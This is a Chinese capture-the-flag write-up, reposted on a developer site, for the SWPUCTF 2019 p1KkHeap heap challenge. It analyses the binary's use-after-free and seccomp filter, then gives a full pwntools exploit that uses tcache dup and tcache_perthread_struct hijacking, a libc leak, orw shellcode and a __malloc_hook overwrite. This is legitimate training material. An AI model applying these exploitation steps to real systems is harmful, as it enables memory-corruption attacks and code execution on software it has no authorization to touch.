首页    技术博客    PHP教程    数据库技术    前端开发   HTML5    Nginx    php论坛
新用户注册 | 会员登录
加入会员,解锁专属内容
取消
热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

SWPUCTF_2019_p1KkHeap

作者:mobiledu2502871951 | 来源:互联网 | 2023-08-15 21:05
SWPUCTF_2019_p1KkHeap总结根据本题,学习与收获有:tcacheattack时如果可以利用tcache_perthread_struct,优先考虑利用这个结构体,

目录
  • SWPUCTF_2019_p1KkHeap
    • 总结
    • 题目分析
      • checksec
      • 函数分析
        • main
        • set_prctl
        • menu
        • add_note
        • show_note
        • edit_note
        • del_note
      • 漏洞点
    • 利用思路
      • 知识点
      • 利用过程
    • EXP
      • 调试过程
      • 完整exp


SWPUCTF_2019_p1KkHeap


总结

根据本题,学习与收获有:



  • tcache attack时 如果可以利用tcache_perthread_struct,优先考虑利用这个结构体,可以省去很多麻烦。控制了这个结构体,相当于就控制了malloc的分配,可以控制tcache binschunk的数量和分配地址。

  • tcache_perthread_struct结构体在堆上,大小一般为0x250。它的前64个字节,分别代表0x20~0x410大小的chunk(包括chunk头)的数量。当超过7的时候,再次释放的chunk会被放入到fastbin或者unsorted bin。后面的内存,则分别表示0x20~0x410大小tcache bins的首地址。

如图所示:

技术分享图片

然后看一下内部细节:

技术分享图片

首地址如果是一个有效的地址,下一次分配对应大小的chunk会直接从该地址处分配,没有chunk size的检查。



  • tcache attack可以重复释放,可以直接修改tcache entry的值,没有chunk size的检查。


题目分析


checksec

技术分享图片

保护全开!


函数分析

很明显,又是一个菜单题。首先来看main函数。


main

技术分享图片

这些函数的名字我都修改过。然后看一下这个set_prctl到底干了啥:


set_prctl

技术分享图片

同时,结合seccomp-tools查看一下禁用了哪些系统调用:

技术分享图片

不能执行execve系统调用。那么结合前面的mmap,猜测可以控制程序执行流到0x66660000处,提前在这里写好shellcode,通过orw的方式读取flag

继续往下分析函数。


技术分享图片


add_note

技术分享图片

size的大小只能控制在0x100以内,最多执行该函数7次。


show_note

技术分享图片


edit_note

技术分享图片


del_note

技术分享图片

可以看到,只能free三次,且存储内存指针的数组没有置为空。


漏洞点



  • 程序的运行环境为ubuntu 18.04libc的版本为2.27,有tcache bin机制。可以很明显的看到,在del_note函数中有一个UAF的漏洞。但是,最多只能free3次。结合tcache dup的利用手段,tcache bin连续两次释放,并不会crash,而会造成这个链表自己指向自己。这样,连续分配三次后,可以在任意地址分配chunk

  • mmap分配的内存具有可读可写可执行的权限,所以可以往这上面写shellcode,然后劫持malloc_hook到地址0x66660000,跳转执行shellcode。注意,不能包含execve的系统调用,所以只能写orw的shellcode。


利用思路


知识点



  • 如上面所说,每一个线程都会维护一个结构体,名为tcache_perthread_struct,这个结构体负责tcache in chunk的分配。所以,只要控制住这个结构体,就能实现控制任意大小的tcache bin chunk的任意地址的分配。

  • tcache bins放满7个后,剩余free掉的chunk会被放到fastbin或者unsorted bin。这里判断对应带大小的tcache bins的方法,就是检查tcache_perthread_struct中的字段的大小是不是大于6。

  • calloc不会从tcache bin中取chunk,但是如果对应大小的tcache bin未满7个的话,会把对应大小的fastbin或者small bin以头插法的形式,插入到tcache bin中。也就是说,如果修改了fd/bk指针,可以往任意一个地方写一个libc地址。(这个知识点可能用不到,不过可以先总结一下。)


利用过程

这里采取劫持tcache_perthread_struct,然后通过控制对应大小的tcache bin的数量,使得下一次释放的chunk被放置在unsorted bin中。,从而泄露出libc的地址,根据偏移计算出malloc_hook的地址。

步骤:



  • 连续申请两块大小为0x100大小的chunk 0chunk 1

  • 连续释放两次chunk 1

  • 通过show功能打印出堆地址,进而泄露出tcache_perthread_struct的地址,并分配到这里

  • 修改0x100大小的tcache bin的首地址为0x66660000和个数为0

  • 分配到0x66660000处,写入shellcode

  • 释放chunk 0,此时chunk 0会进入到unsorted bin,利用show功能打印出libc地址

  • 再次控制tcache_perthread_struct,分配到malloc_hook处,写入0x66660000

  • 任意执行一次add_note即可打印出flag


EXP


调试过程

我们就按照上面所说的这个利用思路来进行调试。

定义好相关的函数:

def add_note(size:int):
global io
io.sendlineafter("Your Choice: ", ‘1‘)
io.sendlineafter("size: ", str(size))
io.recvuntil("Done!\n")
def show_note(idx:int):
global io
io.sendlineafter("Your Choice: ", ‘2‘)
io.sendlineafter("id: ", str(idx))
msg = io.recvline()
leak_addr = msg[9:15]
leak_addr = u64(leak_addr.ljust(8, b‘\x00‘))
LOG_ADDR(‘leak_addr‘, leak_addr)
io.recvuntil("Done!\n")
return leak_addr
def edit_note(idx:int, content:bytes=b‘a‘):
global io
io.sendlineafter("Your Choice: ", ‘3‘)
io.sendlineafter("id: ", str(idx))
io.sendafter("content: ", content)
io.recvuntil("Done!\n")
def del_note(idx:int):
global io
io.sendlineafter("Your Choice: ", ‘4‘)
io.sendlineafter("id: ", str(idx))
io.recvuntil("Done!\n")

首先执行两次add_note

add_note(0x100) # 0
add_note(0x100) # 1

技术分享图片

然后,执行tcache dup

del_note(1)
del_note(1)

技术分享图片

然后泄露出地址,并分配到tcache_perthread_struct

# get heap addr
heap_addr = show_note(1)
tcache_struct = heap_addr - 0x360
add_note(0x100) # 2
edit_note(2, p64(tcache_struct) * 2)
add_note(0x100) # 3
add_note(0x100) # 4 tcache struct

技术分享图片

可以看到,0x100大小的chunkcount变成了-1

分配到0x66660000

edit_note(4, 0xb8 * b‘\x00‘ + p64(0x66660000))
# 0x66660000 chunk
add_note(0x100) # 5

技术分享图片

写入shellcode0x66660000

shellcode = shellcraft.open(‘flag‘, 0)
shellcode += shellcraft.read(3, 0x66660300, 0x30)
shellcode += shellcraft.write(1, 0x66660300, 0x30)
edit_note(5, asm(shellcode))

技术分享图片

泄露libc地址,并且计算出malloc_hook地址

del_note(0)
main_arena_96 = show_note(0)
malloc_hook = main_arena_96 - 0x70

技术分享图片

分配到malloc_hook,写入0x66660000,并执行一次add_note

add_note(0x100) # 6
edit_note(6, p64(0x66660000))
io.sendlineafter("Your Choice: ", ‘1‘)
io.sendlineafter("size: ", str(100))

技术分享图片

最后远程打的结果:

技术分享图片


完整exp

from pwn import *
context.update(arch=‘amd64‘, os=‘linux‘, endian=‘little‘)
io = process(‘./pwn‘)
def add_note(size:int):
global io
io.sendlineafter("Your Choice: ", ‘1‘)
io.sendlineafter("size: ", str(size))
io.recvuntil("Done!\n")
def show_note(idx:int):
global io
io.sendlineafter("Your Choice: ", ‘2‘)
io.sendlineafter("id: ", str(idx))
msg = io.recvline()
leak_addr = msg[9:15]
leak_addr = u64(leak_addr.ljust(8, b‘\x00‘))
LOG_ADDR(‘leak_addr‘, leak_addr)
io.recvuntil("Done!\n")
return leak_addr
def edit_note(idx:int, content:bytes=b‘a‘):
global io
io.sendlineafter("Your Choice: ", ‘3‘)
io.sendlineafter("id: ", str(idx))
io.sendafter("content: ", content)
io.recvuntil("Done!\n")
def del_note(idx:int):
global io
io.sendlineafter("Your Choice: ", ‘4‘)
io.sendlineafter("id: ", str(idx))
io.recvuntil("Done!\n")
# tcache bin dup
add_note(0x100) # 0
add_note(0x100) # 1
del_note(1)
del_note(1)
# get heap addr
heap_addr = show_note(1)
tcache_struct = heap_addr - 0x360
add_note(0x100) # 2
edit_note(2, p64(tcache_struct) * 2)
add_note(0x100) # 3
add_note(0x100) # 4 tcache struct
LOG_ADDR(‘tcache_struct‘, tcache_struct)
edit_note(4, 0xb8 * b‘\x00‘ + p64(0x66660000))
# 0x66660000 chunk
add_note(0x100) # 5
shellcode = shellcraft.open(‘flag‘, 0)
shellcode += shellcraft.read(3, 0x66660300, 0x30)
shellcode += shellcraft.write(1, 0x66660300, 0x30)
edit_note(5, asm(shellcode))
# leak libc_addr
del_note(0)
main_arena_96 = show_note(0)
malloc_hook = main_arena_96 - 0x70
LOG_ADDR(‘malloc_hook‘, malloc_hook)
edit_note(4, 0xb8 * b‘\x00‘ + p64(malloc_hook))
add_note(0x100) # 6
edit_note(6, p64(0x66660000))
io.sendlineafter("Your Choice: ", ‘1‘)
io.sendlineafter("size: ", str(100))
io.interactive()


推荐阅读
  • js

    动态规划算法的基本步骤及最长递增子序列问题详解

    动态规划算法的基本步骤及最长递增子序列问题详解
    本文详细介绍了动态规划算法的基本步骤,包括划分阶段、选择状态、决策和状态转移方程,并以最长递增子序列问题为例进行了详细解析。动态规划算法的有效性依赖于问题本身所具有的最优子结构性质和子问题重叠性质。通过将子问题的解保存在一个表中,在以后尽可能多地利用这些子问题的解,从而提高算法的效率。 ... [详细]
  • import

    Java实现大数乘法(分治算法)

    本文介绍了使用Java实现大数乘法的分治算法,包括输入数据的处理、普通大数乘法的结果和Karatsuba大数乘法的结果。通过改变long类型可以适应不同范围的大数乘法计算。 ... [详细]
  • input

    猜字母游戏

    猜字母游戏
    猜字母游戏猜字母游戏——设计数据结构猜字母游戏——设计程序结构猜字母游戏——实现字母生成方法猜字母游戏——实现字母检测方法猜字母游戏——实现主方法1猜字母游戏——设计数据结构1.1 ... [详细]
  • js

    HDU 2372 El Dorado(DP)的最长上升子序列长度求解方法

    HDU 2372 El Dorado(DP)的最长上升子序列长度求解方法
    本文介绍了解决HDU 2372 El Dorado问题的一种动态规划方法,通过循环k的方式求解最长上升子序列的长度。具体实现过程包括初始化dp数组、读取数列、计算最长上升子序列长度等步骤。 ... [详细]
  • import

    求解hdu 1003 java题目的动态规划优化方法

    本文讨论了如何优化解决hdu 1003 java题目的动态规划方法,通过分析加法规则和最大和的性质,提出了一种优化的思路。具体方法是,当从1加到n为负时,即sum(1,n)sum(n,s),可以继续加法计算。同时,还考虑了两种特殊情况:都是负数的情况和有0的情况。最后,通过使用Scanner类来获取输入数据。 ... [详细]
  • js

    C#之数据集:DataSet对象的使用及相关方法详解

    本文介绍了C#中数据集DataSet对象的使用及相关方法详解,包括DataSet对象的概述、与数据关系对象的互联、Rows集合和Columns集合的组成,以及DataSet对象常用的方法之一——Merge方法的使用。通过本文的阅读,读者可以了解到DataSet对象在C#中的重要性和使用方法。 ... [详细]
  • import

    OC学习笔记之@property和@synthesize

    本文介绍了OC学习笔记中的@property和@synthesize,包括属性的定义和合成的使用方法。通过示例代码详细讲解了@property和@synthesize的作用和用法。 ... [详细]
  • js

    java 线程死锁模拟

    1,关于死锁的理解死锁,我们可以简单的理解为是两个线程同时使用同一资源,两个线程又得不到相应的资源而造成永无相互等待的情况。 2,模拟死锁背景介绍:我们创建一个朋友 ... [详细]
  • js

    指针的引用以及在什么情况下使用指针的引用

    本文介绍了指针的概念以及在函数调用时使用指针作为参数的情况。指针存放的是变量的地址,通过指针可以修改指针所指的变量的值。然而,如果想要修改指针的指向,就需要使用指针的引用。文章还通过一个简单的示例代码解释了指针的引用的使用方法,并思考了在修改指针的指向后,取指针的输出结果。 ... [详细]
  • js

    asp.net微信公众平台开发目录汇总陆续更新的相关内容

    本文内容为asp.net微信公众平台开发的目录汇总,包括数据库设计、多层架构框架搭建和入口实现、微信消息封装及反射赋值、关注事件、用户记录、回复文本消息、图文消息、服务搭建(接入)、自定义菜单等。同时提供了示例代码和相关的后台管理功能。内容涵盖了多个方面,适合综合运用。 ... [详细]
  • list

    Mac OS 升级到11.2.2 Eclipse打不开了,报错Failed to create the Java Virtual Machine

    Mac OS 升级到11.2.2 Eclipse打不开了,报错Failed to create the Java Virtual Machine
    本文介绍了在Mac OS升级到11.2.2版本后,使用Eclipse打开时出现报错Failed to create the Java Virtual Machine的问题,并提供了解决方法。 ... [详细]
  • const

    Hibernate基础映射

    在说Hibernate映射前,我们先来了解下对象关系映射ORM。ORM的实现思想就是将关系数据库中表的数据映射成对象,以对象的形式展现。这样开发人员就可以把对数据库的操作转化为对 ... [详细]
  • js

    SpringBoot集成前端模版(thymeleaf)的配置步骤

    本文介绍了在SpringBoot中集成thymeleaf前端模版的配置步骤,包括在application.properties配置文件中添加thymeleaf的配置信息,引入thymeleaf的jar包,以及创建PageController并添加index方法。 ... [详细]
  • js

    知识图谱——机器大脑中的知识库

    知识图谱——机器大脑中的知识库
    本文介绍了知识图谱在机器大脑中的应用,以及搜索引擎在知识图谱方面的发展。以谷歌知识图谱为例,说明了知识图谱的智能化特点。通过搜索引擎用户可以获取更加智能化的答案,如搜索关键词"Marie Curie",会得到居里夫人的详细信息以及与之相关的历史人物。知识图谱的出现引起了搜索引擎行业的变革,不仅美国的微软必应,中国的百度、搜狗等搜索引擎公司也纷纷推出了自己的知识图谱。 ... [详细]
  • js

    测试人的性格,点火让他着急,考验婚姻问题的善意玩人

    本文讲述了作者通过点火测试男友的性格和承受能力,以考验婚姻问题。作者故意不安慰男友并再次点火,观察他的反应。这个行为是善意的玩人,旨在了解男友的性格和避免婚姻问题。 ... [详细]
author-avatar
mobiledu2502871951
这个家伙很懒,什么也没留下!
Tags | 热门标签
RankList | 热门文章
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有